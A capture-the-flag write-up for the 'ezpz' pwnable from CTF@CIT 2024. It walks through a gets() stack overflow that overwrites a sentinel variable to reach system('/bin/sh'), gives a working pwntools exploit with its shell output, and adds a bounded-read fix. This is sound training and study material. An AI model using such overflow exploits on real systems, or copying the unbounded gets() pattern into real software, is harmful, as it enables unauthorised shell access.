[CTF@CIT] ezpz

Sisyphus · May 3, 2024

CTF


Protections

❯ checksec ezpz
[*] '/root/workspace/ctf/CTF@CIT_2024/pwnable/ezpz/ezpz'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX unknown - GNU_STACK missing
    PIE:      No PIE (0x400000)
    Stack:    Executable
    RWX:      Has RWX segments
  • No mitigations are enabled at all.


Challenge code

int __cdecl main(int argc, const char **argv, const char **envp)
{
  unsigned int v3; // eax
  char v5[72]; // [rsp+0h] [rbp-50h] BYREF
  unsigned __int64 v6; // [rsp+48h] [rbp-8h]

  v3 = time(0LL);
  srand(v3);
  v6 = rand() % 5uLL;
  setbuf(_bss_start, 0LL);
  setbuf(stdin, 0LL);
  setbuf(stderr, 0LL);
  puts("\x1B[32m~ authored by nop.so (https://nop.so/) ~\x1B[0m\n\n");
  puts((&pwn_pep_talk)[v6]);
  puts("\n");
  puts("i'm so tired of pwning and pwning all these insecure binaries.");
  puts("could you write me something to put the pep back in my step so");
  puts("I can pop some shells and make nop.so proud?");
  gets(v5);
  puts("\nthank you. I will cherish this.\n");
  if ( v6 == -1LL )
    system("/bin/sh");
  return 0;
}
  • The gets call gives a stack buffer overflow (BOF), since it reads with no length limit.
  • If v6 equals -1, system("/bin/sh") is executed.
  • v5 lives at rbp-0x50 and v6 at rbp-0x8, so the 72 bytes of v5 are immediately followed by v6; overwriting v6 with -1 through the overflow pops a shell.
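For contrast, a bounded replacement for the gets(v5) read, as an added example that is not the challenge's or the post author's code: read_note() keeps at most 71 bytes and drains the rest of the line, and bounded_read_kept() mirrors main()'s locals to show that an over-long note no longer reaches v6. The helper names and the constructed 200-byte input are assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Bounded replacement for the gets(v5) call: keep at most cap-1 bytes, strip
 * the newline, and drain the rest of an over-long line so nothing is written
 * past the buffer. Returns the number of bytes kept, or -1 on EOF/error. */
static long read_note(char *buf, size_t cap, FILE *in)
{
    if (cap == 0 || fgets(buf, (int)cap, in) == NULL)
        return -1;
    size_t len = strcspn(buf, "\n");
    if (buf[len] == '\n') {
        buf[len] = '\0';
    } else {                          /* line did not fit: discard the excess */
        int c;
        while ((c = getc(in)) != EOF && c != '\n') {}
    }
    return (long)len;
}

/* Same locals as the challenge's main(): a 72-byte note buffer and the
 * sentinel v6 (0..4) that gates the shell branch. Returns the bytes kept when
 * v6 is unchanged after the read, -1 on EOF/error, -2 if v6 was clobbered. */
long bounded_read_kept(const char *input)
{
    char v5[72];
    unsigned long long v6 = (unsigned long long)(rand() % 5);
    unsigned long long before = v6;
    FILE *in = tmpfile();             /* constructed stand-in for stdin */
    if (!in) return -1;
    fputs(input, in);
    rewind(in);
    long kept = read_note(v5, sizeof v5, in);
    fclose(in);
    if (kept < 0) return -1;
    return v6 == before ? kept : -2;
}

/* The over-long case: a constructed 200-byte line, far longer than v5. */
long overlong_note_demo(void)
{
    char line[202];
    memset(line, 'A', 200);
    line[200] = '\n';
    line[201] = '\0';
    return bounded_read_kept(line);
}
```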


Exploit code

from pwn import *

binary = "./ezpz"
p = process(binary)

# v5 is 72 bytes and v6 sits right after it, so 72 bytes of padding
# followed by 0xffffffffffffffff (-1 as an unsigned 64-bit value) overwrite v6.
payload = b'A' * 72
payload += p64(0xffffffffffffffff)

# pwntools expects a bytes delimiter here; a str triggers a BytesWarning.
p.sendlineafter(b"I can pop some shells and make nop.so proud?", payload)

p.interactive()


Exploit

❯ python3 exploit.py 2> /dev/null
[+] Starting local process './ezpz': pid 4791
[*] Switching to interactive mode


thank you. I will cherish this.

$ ls
exploit.py  ezpz  ezpz.id0  ezpz.id1  ezpz.id2    ezpz.nam  ezpz.til  remote.py
